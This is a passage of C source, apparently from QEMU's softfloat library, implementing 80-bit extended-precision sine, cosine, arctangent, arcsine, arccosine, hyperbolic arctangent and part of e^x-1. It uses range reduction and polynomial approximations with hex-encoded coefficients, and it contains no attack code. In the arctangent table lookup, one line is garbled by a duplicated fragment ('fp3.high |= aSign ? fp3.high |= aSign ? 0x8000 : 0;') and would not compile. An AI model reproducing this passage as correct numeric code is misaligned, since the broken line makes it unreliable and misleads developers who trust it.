floatx80_mul(fp0, fp2, status); /* S(B2+T(B4+T(B6+TB8))) */ fp0 = floatx80_add(fp0, fp1, status); /* [B1+T(B3+T(B5+TB7))]+ * [S(B2+T(B4+T(B6+TB8)))] */ x = packFloatx80(xSign, xExp, xSig); fp0 = floatx80_mul(fp0, x, status); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = 
floatx80_add(fp0, float32_to_floatx80(posneg1, status), status); float_raise(float_flag_inexact, status); return a; } else { /* SINPOLY */ xSign = extractFloatx80Sign(fp0); /* X IS R */ xExp = extractFloatx80Exp(fp0); xSig = extractFloatx80Frac(fp0); xSign ^= (n >> 1) & 1; /* X IS NOW R'= SGN*R */ fp0 = floatx80_mul(fp0, fp0, status); /* FP0 IS S */ fp1 = floatx80_mul(fp0, fp0, status); /* FP1 IS T */ fp3 = float64_to_floatx80(make_float64(0xBD6AAA77CCC994F5), status); /* A7 */ fp2 = float64_to_floatx80(make_float64(0x3DE612097AAE8DA1), status); /* A6 */ fp3 = floatx80_mul(fp3, fp1, status); /* T*A7 */ fp2 = floatx80_mul(fp2, fp1, status); /* T*A6 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0xBE5AE6452A118AE4), status), status); /* A5+T*A7 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3EC71DE3A5341531), status), status); /* A4+T*A6 */ fp3 = floatx80_mul(fp3, fp1, status); /* T(A5+TA7) */ fp2 = floatx80_mul(fp2, fp1, status); /* T(A4+TA6) */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0xBF2A01A01A018B59), status), status); /* A3+T(A5+TA7) */ fp4 = packFloatx80(0, 0x3FF8, UINT64_C(0x88888888888859AF)); fp2 = floatx80_add(fp2, fp4, status); /* A2+T(A4+TA6) */ fp1 = floatx80_mul(fp1, fp3, status); /* T(A3+T(A5+TA7)) */ fp2 = floatx80_mul(fp2, fp0, status); /* S(A2+T(A4+TA6)) */ fp4 = packFloatx80(1, 0x3FFC, UINT64_C(0xAAAAAAAAAAAAAA99)); fp1 = floatx80_add(fp1, fp4, status); /* A1+T(A3+T(A5+TA7)) */ fp1 = floatx80_add(fp1, fp2, status); /* [A1+T(A3+T(A5+TA7))]+ * [S(A2+T(A4+TA6))] */ x = packFloatx80(xSign, xExp, xSig); fp0 = floatx80_mul(fp0, x, status); /* R'*S */ fp0 = floatx80_mul(fp0, fp1, status); /* SIN(R')-R' */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, x, status); float_raise(float_flag_inexact, status); return a; } } } /* * Cosine */ floatx80 floatx80_cos(floatx80 a, float_status *status) { flag aSign, xSign; int32_t aExp, xExp; uint64_t aSig, xSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact, l, n, j; floatx80 fp0, fp1, fp2, fp3, fp4, fp5, x, invtwopi, twopi1, twopi2; float32 posneg1, twoto63; flag endflag; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } if (aExp == 0 && aSig == 0) { return packFloatx80(0, one_exp, one_sig); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; compact = floatx80_make_compact(aExp, aSig); fp0 = a; if (compact < 0x3FD78000 || compact > 0x4004BC7E) { /* 2^(-40) > |X| > 15 PI */ if (compact > 0x3FFF8000) { /* |X| >= 15 PI */ /* REDUCEX */ fp1 = packFloatx80(0, 0, 0); if (compact == 0x7FFEFFFF) { twopi1 = packFloatx80(aSign ^ 1, 0x7FFE, UINT64_C(0xC90FDAA200000000)); twopi2 = packFloatx80(aSign ^ 1, 0x7FDC, UINT64_C(0x85A308D300000000)); fp0 = floatx80_add(fp0, twopi1, status); fp1 = fp0; fp0 = floatx80_add(fp0, twopi2, status); fp1 = floatx80_sub(fp1, fp0, status); fp1 = floatx80_add(fp1, twopi2, status); } loop: xSign = extractFloatx80Sign(fp0); xExp = extractFloatx80Exp(fp0); xExp -= 0x3FFF; if (xExp <= 28) { l = 0; endflag = 1; } else { l = xExp - 27; endflag = 0; } invtwopi = packFloatx80(0, 0x3FFE - l, UINT64_C(0xA2F9836E4E44152A)); /* INVTWOPI */ 
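/* One REDUCEX pass: fp2 = round(X * invtwopi) via the 2^63 add/subtract trick below, then fp2 times pi/2 is removed in a high piece (twopi1) and a low piece (twopi2) so the reduced argument keeps full precision even for very large |X|. */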
twopi1 = packFloatx80(0, 0x3FFF + l, UINT64_C(0xC90FDAA200000000)); twopi2 = packFloatx80(0, 0x3FDD + l, UINT64_C(0x85A308D300000000)); /* SIGN(INARG)*2^63 IN SGL */ twoto63 = packFloat32(xSign, 0xBE, 0); fp2 = floatx80_mul(fp0, invtwopi, status); fp2 = floatx80_add(fp2, float32_to_floatx80(twoto63, status), status); /* THE FRACT PART OF FP2 IS ROUNDED */ fp2 = floatx80_sub(fp2, float32_to_floatx80(twoto63, status), status); /* FP2 is N */ fp4 = floatx80_mul(twopi1, fp2, status); /* W = N*P1 */ fp5 = floatx80_mul(twopi2, fp2, status); /* w = N*P2 */ fp3 = floatx80_add(fp4, fp5, status); /* FP3 is P */ fp4 = floatx80_sub(fp4, fp3, status); /* W-P */ fp0 = floatx80_sub(fp0, fp3, status); /* FP0 is A := R - P */ fp4 = floatx80_add(fp4, fp5, status); /* FP4 is p = (W-P)+w */ fp3 = fp0; /* FP3 is A */ fp1 = floatx80_sub(fp1, fp4, status); /* FP1 is a := r - p */ fp0 = floatx80_add(fp0, fp1, status); /* FP0 is R := A+a */ if (endflag > 0) { n = floatx80_to_int32(fp2, status); goto sincont; } fp3 = floatx80_sub(fp3, fp0, status); /* A-R */ fp1 = floatx80_add(fp1, fp3, status); /* FP1 is r := (A-R)+a */ goto loop; } else { /* SINSM */ fp0 = float32_to_floatx80(make_float32(0x3F800000), status); /* 1 */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; /* COSTINY */ a = floatx80_sub(fp0, float32_to_floatx80( make_float32(0x00800000), status), status); float_raise(float_flag_inexact, status); return a; } } else { fp1 = floatx80_mul(fp0, float64_to_floatx80( make_float64(0x3FE45F306DC9C883), status), status); /* X*2/PI */ n = floatx80_to_int32(fp1, status); j = 32 + n; fp0 = floatx80_sub(fp0, pi_tbl[j], status); /* X-Y1 */ fp0 = floatx80_sub(fp0, float32_to_floatx80(pi_tbl2[j], status), status); /* FP0 IS R = (X-Y1)-Y2 */ sincont: if ((n + 1) & 1) { /* COSPOLY */ fp0 = floatx80_mul(fp0, fp0, status); /* FP0 IS S */ fp1 = floatx80_mul(fp0, fp0, status); /* FP1 IS T */ fp2 = float64_to_floatx80(make_float64(0x3D2AC4D0D6011EE3), status); /* B8 */ fp3 = float64_to_floatx80(make_float64(0xBDA9396F9F45AC19), status); /* B7 */ xSign = extractFloatx80Sign(fp0); /* X IS S */ xExp = extractFloatx80Exp(fp0); xSig = extractFloatx80Frac(fp0); if (((n + 1) >> 1) & 1) { xSign ^= 1; posneg1 = make_float32(0xBF800000); /* -1 */ } else { xSign ^= 0; posneg1 = make_float32(0x3F800000); /* 1 */ } /* X IS NOW R'= SGN*R */ fp2 = floatx80_mul(fp2, fp1, status); /* TB8 */ fp3 = floatx80_mul(fp3, fp1, status); /* TB7 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3E21EED90612C972), status), status); /* B6+TB8 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0xBE927E4FB79D9FCF), status), status); /* B5+TB7 */ fp2 = floatx80_mul(fp2, fp1, status); /* T(B6+TB8) */ fp3 = floatx80_mul(fp3, fp1, status); /* T(B5+TB7) */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3EFA01A01A01D423), status), status); /* B4+T(B6+TB8) */ fp4 = packFloatx80(1, 0x3FF5, UINT64_C(0xB60B60B60B61D438)); fp3 = floatx80_add(fp3, fp4, status); /* B3+T(B5+TB7) */ fp2 = floatx80_mul(fp2, fp1, status); /* T(B4+T(B6+TB8)) */ fp1 = floatx80_mul(fp1, fp3, status); /* T(B3+T(B5+TB7)) */ fp4 = packFloatx80(0, 0x3FFA, UINT64_C(0xAAAAAAAAAAAAAB5E)); fp2 = floatx80_add(fp2, fp4, status); /* B2+T(B4+T(B6+TB8)) */ fp1 = floatx80_add(fp1, float32_to_floatx80( make_float32(0xBF000000), status), status); /* B1+T(B3+T(B5+TB7)) */ fp0 = floatx80_mul(fp0, fp2, status); /* S(B2+T(B4+T(B6+TB8))) */ fp0 = floatx80_add(fp0, fp1, status); /* [B1+T(B3+T(B5+TB7))]+[S(B2+T(B4+T(B6+TB8)))] */ x = 
packFloatx80(xSign, xExp, xSig); fp0 = floatx80_mul(fp0, x, status); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, float32_to_floatx80(posneg1, status), status); float_raise(float_flag_inexact, status); return a; } else { /* SINPOLY */ xSign = extractFloatx80Sign(fp0); /* X IS R */ xExp = extractFloatx80Exp(fp0); xSig = extractFloatx80Frac(fp0); xSign ^= ((n + 1) >> 1) & 1; /* X IS NOW R'= SGN*R */ fp0 = floatx80_mul(fp0, fp0, status); /* FP0 IS S */ fp1 = floatx80_mul(fp0, fp0, status); /* FP1 IS T */ fp3 = float64_to_floatx80(make_float64(0xBD6AAA77CCC994F5), status); /* A7 */ fp2 = float64_to_floatx80(make_float64(0x3DE612097AAE8DA1), status); /* A6 */ fp3 = floatx80_mul(fp3, fp1, status); /* T*A7 */ fp2 = floatx80_mul(fp2, fp1, status); /* T*A6 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0xBE5AE6452A118AE4), status), status); /* A5+T*A7 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3EC71DE3A5341531), status), status); /* A4+T*A6 */ fp3 = floatx80_mul(fp3, fp1, status); /* T(A5+TA7) */ fp2 = floatx80_mul(fp2, fp1, status); /* T(A4+TA6) */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0xBF2A01A01A018B59), status), status); /* A3+T(A5+TA7) */ fp4 = packFloatx80(0, 0x3FF8, UINT64_C(0x88888888888859AF)); fp2 = floatx80_add(fp2, fp4, status); /* A2+T(A4+TA6) */ fp1 = floatx80_mul(fp1, fp3, status); /* T(A3+T(A5+TA7)) */ fp2 = floatx80_mul(fp2, fp0, status); /* S(A2+T(A4+TA6)) */ fp4 = packFloatx80(1, 0x3FFC, UINT64_C(0xAAAAAAAAAAAAAA99)); fp1 = floatx80_add(fp1, fp4, status); /* A1+T(A3+T(A5+TA7)) */ fp1 = floatx80_add(fp1, fp2, status); /* [A1+T(A3+T(A5+TA7))]+[S(A2+T(A4+TA6))] */ x = packFloatx80(xSign, xExp, xSig); fp0 = floatx80_mul(fp0, x, status); /* R'*S */ fp0 = floatx80_mul(fp0, fp1, status); /* SIN(R')-R' */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, x, status); float_raise(float_flag_inexact, status); return a; } } } /* * Arc tangent */ floatx80 floatx80_atan(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact, tbl_index; floatx80 fp0, fp1, fp2, fp3, xsave; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } a = packFloatx80(aSign, piby2_exp, pi_sig); float_raise(float_flag_inexact, status); return floatx80_move(a, status); } if (aExp == 0 && aSig == 0) { return packFloatx80(aSign, 0, 0); } compact = floatx80_make_compact(aExp, aSig); user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; if (compact < 0x3FFB8000 || compact > 0x4002FFFF) { /* |X| >= 16 or |X| < 1/16 */ if (compact > 0x3FFF8000) { /* |X| >= 16 */ if (compact > 0x40638000) { /* |X| > 2^(100) */ fp0 = packFloatx80(aSign, piby2_exp, pi_sig); fp1 = packFloatx80(aSign, 0x0001, one_sig); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_sub(fp0, fp1, status); float_raise(float_flag_inexact, status); return a; } else { fp0 = a; fp1 = packFloatx80(1, one_exp, one_sig); /* -1 */ fp1 = floatx80_div(fp1, fp0, status); /* X' = -1/X */ xsave = fp1; fp0 = floatx80_mul(fp1, fp1, status); /* Y = X'*X' */ fp1 = 
floatx80_mul(fp0, fp0, status); /* Z = Y*Y */ fp3 = float64_to_floatx80(make_float64(0xBFB70BF398539E6A), status); /* C5 */ fp2 = float64_to_floatx80(make_float64(0x3FBC7187962D1D7D), status); /* C4 */ fp3 = floatx80_mul(fp3, fp1, status); /* Z*C5 */ fp2 = floatx80_mul(fp2, fp1, status); /* Z*C4 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0xBFC24924827107B8), status), status); /* C3+Z*C5 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3FC999999996263E), status), status); /* C2+Z*C4 */ fp1 = floatx80_mul(fp1, fp3, status); /* Z*(C3+Z*C5) */ fp2 = floatx80_mul(fp2, fp0, status); /* Y*(C2+Z*C4) */ fp1 = floatx80_add(fp1, float64_to_floatx80( make_float64(0xBFD5555555555536), status), status); /* C1+Z*(C3+Z*C5) */ fp0 = floatx80_mul(fp0, xsave, status); /* X'*Y */ /* [Y*(C2+Z*C4)]+[C1+Z*(C3+Z*C5)] */ fp1 = floatx80_add(fp1, fp2, status); /* X'*Y*([B1+Z*(B3+Z*B5)]+[Y*(B2+Z*(B4+Z*B6))]) ?? */ fp0 = floatx80_mul(fp0, fp1, status); fp0 = floatx80_add(fp0, xsave, status); fp1 = packFloatx80(aSign, piby2_exp, pi_sig); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, fp1, status); float_raise(float_flag_inexact, status); return a; } } else { /* |X| < 1/16 */ if (compact < 0x3FD78000) { /* |X| < 2^(-40) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_move(a, status); float_raise(float_flag_inexact, status); return a; } else { fp0 = a; xsave = a; fp0 = floatx80_mul(fp0, fp0, status); /* Y = X*X */ fp1 = floatx80_mul(fp0, fp0, status); /* Z = Y*Y */ fp2 = float64_to_floatx80(make_float64(0x3FB344447F876989), status); /* B6 */ fp3 = float64_to_floatx80(make_float64(0xBFB744EE7FAF45DB), status); /* B5 */ fp2 = floatx80_mul(fp2, fp1, status); /* Z*B6 */ fp3 = floatx80_mul(fp3, fp1, status); /* Z*B5 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3FBC71C646940220), status), status); /* B4+Z*B6 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0xBFC24924921872F9), status), status); /* B3+Z*B5 */ fp2 = floatx80_mul(fp2, fp1, status); /* Z*(B4+Z*B6) */ fp1 = floatx80_mul(fp1, fp3, status); /* Z*(B3+Z*B5) */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3FC9999999998FA9), status), status); /* B2+Z*(B4+Z*B6) */ fp1 = floatx80_add(fp1, float64_to_floatx80( make_float64(0xBFD5555555555555), status), status); /* B1+Z*(B3+Z*B5) */ fp2 = floatx80_mul(fp2, fp0, status); /* Y*(B2+Z*(B4+Z*B6)) */ fp0 = floatx80_mul(fp0, xsave, status); /* X*Y */ /* [B1+Z*(B3+Z*B5)]+[Y*(B2+Z*(B4+Z*B6))] */ fp1 = floatx80_add(fp1, fp2, status); /* X*Y*([B1+Z*(B3+Z*B5)]+[Y*(B2+Z*(B4+Z*B6))]) */ fp0 = floatx80_mul(fp0, fp1, status); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, xsave, status); float_raise(float_flag_inexact, status); return a; } } } else { aSig &= UINT64_C(0xF800000000000000); aSig |= UINT64_C(0x0400000000000000); xsave = packFloatx80(aSign, aExp, aSig); /* F */ fp0 = a; fp1 = a; /* X */ fp2 = packFloatx80(0, one_exp, one_sig); /* 1 */ fp1 = floatx80_mul(fp1, xsave, status); /* X*F */ fp0 = floatx80_sub(fp0, xsave, status); /* X-F */ fp1 = floatx80_add(fp1, fp2, status); /* 1 + X*F */ fp0 = floatx80_div(fp0, fp1, status); /* U = (X-F)/(1+X*F) */ tbl_index = compact; tbl_index &= 0x7FFF0000; tbl_index -= 0x3FFB0000; tbl_index >>= 1; tbl_index += compact & 0x00007800; tbl_index >>= 11; fp3 = atan_tbl[tbl_index]; fp3.high |= aSign ? 
fp3.high |= aSign ? 0x8000 : 0; /* ATAN(F) */ fp1 = floatx80_mul(fp0, fp0, status); /* V = U*U */ fp2 = float64_to_floatx80(make_float64(0xBFF6687E314987D8), status); /* A3 */ fp2 = floatx80_add(fp2, fp1, status); /* A3+V */ fp2 = floatx80_mul(fp2, fp1, status); /* V*(A3+V) */ fp1 = floatx80_mul(fp1, fp0, status); /* U*V */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x4002AC6934A26DB3), status), status); /* A2+V*(A3+V) */ fp1 = floatx80_mul(fp1, float64_to_floatx80( make_float64(0xBFC2476F4E1DA28E), status), status); /* A1*U*V */ fp1 = floatx80_mul(fp1, fp2, status); /* A1*U*V*(A2+V*(A3+V)) */ fp0 = floatx80_add(fp0, fp1, status); /* ATAN(U) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, fp3, status); /* ATAN(X) */ float_raise(float_flag_inexact, status); return a; } } /* * Arc sine */ floatx80 floatx80_asin(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact; floatx80 fp0, fp1, fp2, one; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF && (uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } if (aExp == 0 && aSig == 0) { return packFloatx80(aSign, 0, 0); } compact = floatx80_make_compact(aExp, aSig); if (compact >= 0x3FFF8000) { /* |X| >= 1 */ if (aExp == one_exp && aSig == one_sig) { /* |X| == 1 */ float_raise(float_flag_inexact, status); a = packFloatx80(aSign, piby2_exp, pi_sig); return floatx80_move(a, status); } else { /* |X| > 1 */ float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } } /* |X| < 1 */ user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; one = packFloatx80(0, one_exp, one_sig); fp0 = a; fp1 = floatx80_sub(one, fp0, status); /* 1 - X */ fp2 = floatx80_add(one, fp0, status); /* 1 + X */ fp1 = floatx80_mul(fp2, fp1, status); /* (1+X)*(1-X) */ fp1 = floatx80_sqrt(fp1, status); /* SQRT((1+X)*(1-X)) */ fp0 = floatx80_div(fp0, fp1, status); /* X/SQRT((1+X)*(1-X)) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_atan(fp0, status); /* ATAN(X/SQRT((1+X)*(1-X))) */ float_raise(float_flag_inexact, status); return a; } /* * Arc cosine */ floatx80 floatx80_acos(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact; floatx80 fp0, fp1, one; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF && (uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } if (aExp == 0 && aSig == 0) { float_raise(float_flag_inexact, status); return roundAndPackFloatx80(status->floatx80_rounding_precision, 0, piby2_exp, pi_sig, 0, status); } compact = floatx80_make_compact(aExp, aSig); if (compact >= 0x3FFF8000) { /* |X| >= 1 */ if (aExp == one_exp && aSig == one_sig) { /* |X| == 1 */ if (aSign) { /* X == -1 */ a = packFloatx80(0, pi_exp, pi_sig); float_raise(float_flag_inexact, status); return floatx80_move(a, status); } else { /* X == +1 */ return packFloatx80(0, 0, 0); } } else { /* |X| > 1 */ float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } } /* |X| < 1 */ user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision;
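/*
 * The |X| < 1 path below uses the half-angle identity
 * acos(x) = 2 * atan(sqrt((1 - x) / (1 + x))): writing x = cos(t) with
 * 0 <= t <= pi gives tan(t / 2) = sqrt((1 - cos t) / (1 + cos t)), so
 * t = 2 * atan(sqrt((1 - x) / (1 + x))). The argument passed to
 * floatx80_atan is therefore always in [0, +inf), and the final
 * floatx80_add(fp0, fp0, ...) performs the doubling.
 */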
status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; one = packFloatx80(0, one_exp, one_sig); fp0 = a; fp1 = floatx80_add(one, fp0, status); /* 1 + X */ fp0 = floatx80_sub(one, fp0, status); /* 1 - X */ fp0 = floatx80_div(fp0, fp1, status); /* (1-X)/(1+X) */ fp0 = floatx80_sqrt(fp0, status); /* SQRT((1-X)/(1+X)) */ fp0 = floatx80_atan(fp0, status); /* ATAN(SQRT((1-X)/(1+X))) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, fp0, status); /* 2 * ATAN(SQRT((1-X)/(1+X))) */ float_raise(float_flag_inexact, status); return a; } /* * Hyperbolic arc tangent */ floatx80 floatx80_atanh(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact; floatx80 fp0, fp1, fp2, one; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF && (uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } if (aExp == 0 && aSig == 0) { return packFloatx80(aSign, 0, 0); } compact = floatx80_make_compact(aExp, aSig); if (compact >= 0x3FFF8000) { /* |X| >= 1 */ if (aExp == one_exp && aSig == one_sig) { /* |X| == 1 */ float_raise(float_flag_divbyzero, status); return packFloatx80(aSign, floatx80_infinity.high, floatx80_infinity.low); } else { /* |X| > 1 */ float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } } /* |X| < 1 */ user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; one = packFloatx80(0, one_exp, one_sig); fp2 = packFloatx80(aSign, 0x3FFE, one_sig); /* SIGN(X) * (1/2) */ fp0 = packFloatx80(0, aExp, aSig); /* Y = |X| */ fp1 = packFloatx80(1, aExp, aSig); /* -Y */ fp0 = floatx80_add(fp0, fp0, status); /* 2Y */ fp1 = floatx80_add(fp1, one, status); /* 1-Y */ fp0 = floatx80_div(fp0, fp1, status); /* Z = 2Y/(1-Y) */ fp0 = floatx80_lognp1(fp0, status); /* LOG1P(Z) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_mul(fp0, fp2, status); /* ATANH(X) = SIGN(X) * (1/2) * LOG1P(Z) */ float_raise(float_flag_inexact, status); return a; } /* * e to x minus 1 */ floatx80 floatx80_etoxm1(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact, n, j, m, m1; floatx80 fp0, fp1, fp2, fp3, l2, sc, onebysc; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } if (aSign) { return packFloatx80(aSign, one_exp, one_sig); } return packFloatx80(0, floatx80_infinity.high, floatx80_infinity.low); } if (aExp == 0 && aSig == 0) { return packFloatx80(aSign, 0, 0); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; if (aExp >= 0x3FFD) { /* |X| >= 1/4 */ compact = floatx80_make_compact(aExp, aSig); if (compact <= 0x4004C215) { /* |X| <= 70 log2 */ fp0 = a; fp1 = a; fp0 = floatx80_mul(fp0, float32_to_floatx80( make_float32(0x42B8AA3B), status), status); /* 64/log2 * X */ n = floatx80_to_int32(fp0, status); /* int(64/log2*X) */ fp0 = int32_to_floatx80(n, status); j = n & 0x3F; /* J = N mod 64 */ m = n / 64; 
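/*
 * Cody/Waite-style range reduction: X = N*(log2/64) + R with
 * N = round(X*64/log2), J = N mod 64 and M = N div 64, so that
 * exp(X) - 1 = 2^M * 2^(J/64) * exp(R) - 1. The constant -log2/64 is
 * split into a lead part L1 and a trail part L2 (added separately
 * below) to keep R accurate, and 2^(J/64) comes from exp_tbl[J] plus
 * the float32 correction term exp_tbl2[J]. A rough double-precision
 * sketch of the same reduction (illustrative only; made-up names, and
 * the real code carries far more precision):
 */
#if 0
#include <math.h>
static double expm1_sketch(double x)
{
    double n = rint(x * 64.0 / M_LN2);    /* N = round(64/log2 * X) */
    int j = (int)n & 0x3f;                /* J = N mod 64           */
    int m = ((int)n - j) / 64;            /* M = N div 64, floor    */
    double r = x - n * (M_LN2 / 64.0);    /* reduced argument R     */
    return ldexp(exp2(j / 64.0) * exp(r), m) - 1.0;
}
#endif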
/* NOTE: this is really arithmetic right shift by 6 */ if (n < 0 && j) { /* * arithmetic right shift is division and * round towards minus infinity */ m--; } m1 = -m; /*m += 0x3FFF; // biased exponent of 2^(M) */ /*m1 += 0x3FFF; // biased exponent of -2^(-M) */ fp2 = fp0; /* N */ fp0 = floatx80_mul(fp0, float32_to_floatx80( make_float32(0xBC317218), status), status); /* N * L1, L1 = lead(-log2/64) */ l2 = packFloatx80(0, 0x3FDC, UINT64_C(0x82E308654361C4C6)); fp2 = floatx80_mul(fp2, l2, status); /* N * L2, L1+L2 = -log2/64 */ fp0 = floatx80_add(fp0, fp1, status); /* X + N*L1 */ fp0 = floatx80_add(fp0, fp2, status); /* R */ fp1 = floatx80_mul(fp0, fp0, status); /* S = R*R */ fp2 = float32_to_floatx80(make_float32(0x3950097B), status); /* A6 */ fp2 = floatx80_mul(fp2, fp1, status); /* fp2 is S*A6 */ fp3 = floatx80_mul(float32_to_floatx80(make_float32(0x3AB60B6A), status), fp1, status); /* fp3 is S*A5 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3F81111111174385), status), status); /* fp2 IS A4+S*A6 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0x3FA5555555554F5A), status), status); /* fp3 is A3+S*A5 */ fp2 = floatx80_mul(fp2, fp1, status); /* fp2 IS S*(A4+S*A6) */ fp3 = floatx80_mul(fp3, fp1, status); /* fp3 IS S*(A3+S*A5) */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3FC5555555555555), status), status); /* fp2 IS A2+S*(A4+S*A6) */ fp3 = floatx80_add(fp3, float32_to_floatx80( make_float32(0x3F000000), status), status); /* fp3 IS A1+S*(A3+S*A5) */ fp2 = floatx80_mul(fp2, fp1, status); /* fp2 IS S*(A2+S*(A4+S*A6)) */ fp1 = floatx80_mul(fp1, fp3, status); /* fp1 IS S*(A1+S*(A3+S*A5)) */ fp2 = floatx80_mul(fp2, fp0, status); /* fp2 IS R*S*(A2+S*(A4+S*A6)) */ fp0 = floatx80_add(fp0, fp1, status); /* fp0 IS R+S*(A1+S*(A3+S*A5)) */ fp0 = floatx80_add(fp0, fp2, status); /* fp0 IS EXP(R) - 1 */ fp0 = floatx80_mul(fp0, exp_tbl[j], status); /* 2^(J/64)*(Exp(R)-1) */ if (m >= 64) { fp1 = float32_to_floatx80(exp_tbl2[j], status); onebysc = packFloatx80(1, m1 + 0x3FFF, one_sig); /* -2^(-M) */ fp1 = floatx80_add(fp1, onebysc, status); fp0 = floatx80_add(fp0, fp1, status); fp0 = floatx80_add(fp0, exp_tbl[j], status); } else if (m < -3) { fp0 = floatx80_add(fp0, float32_to_floatx80(exp_tbl2[j], status), status); fp0 = floatx80_add(fp0, exp_tbl[j], status); onebysc = packFloatx80(1, m1 + 0x3FFF, one_sig); /* -2^(-M) */ fp0 = floatx80_add(fp0, onebysc, status); } else { /* -3 <= m <= 63 */ fp1 = exp_tbl[j]; fp0 = floatx80_add(fp0, float32_to_floatx80(exp_tbl2[j], status), status); onebysc = packFloatx80(1, m1 + 0x3FFF, one_sig); /* -2^(-M) */ fp1 = floatx80_add(fp1, onebysc, status); fp0 = floatx80_add(fp0, fp1, status); } sc = packFloatx80(0, m + 0x3FFF, one_sig); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_mul(fp0, sc, status); float_raise(float_flag_inexact, status); return a; } else { /* |X| > 70 log2 */ if (aSign) { fp0 = float32_to_floatx80(make_float32(0xBF800000), status); /* -1 */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, float32_to_floatx80( make_float32(0x00800000), status), status); /* -1 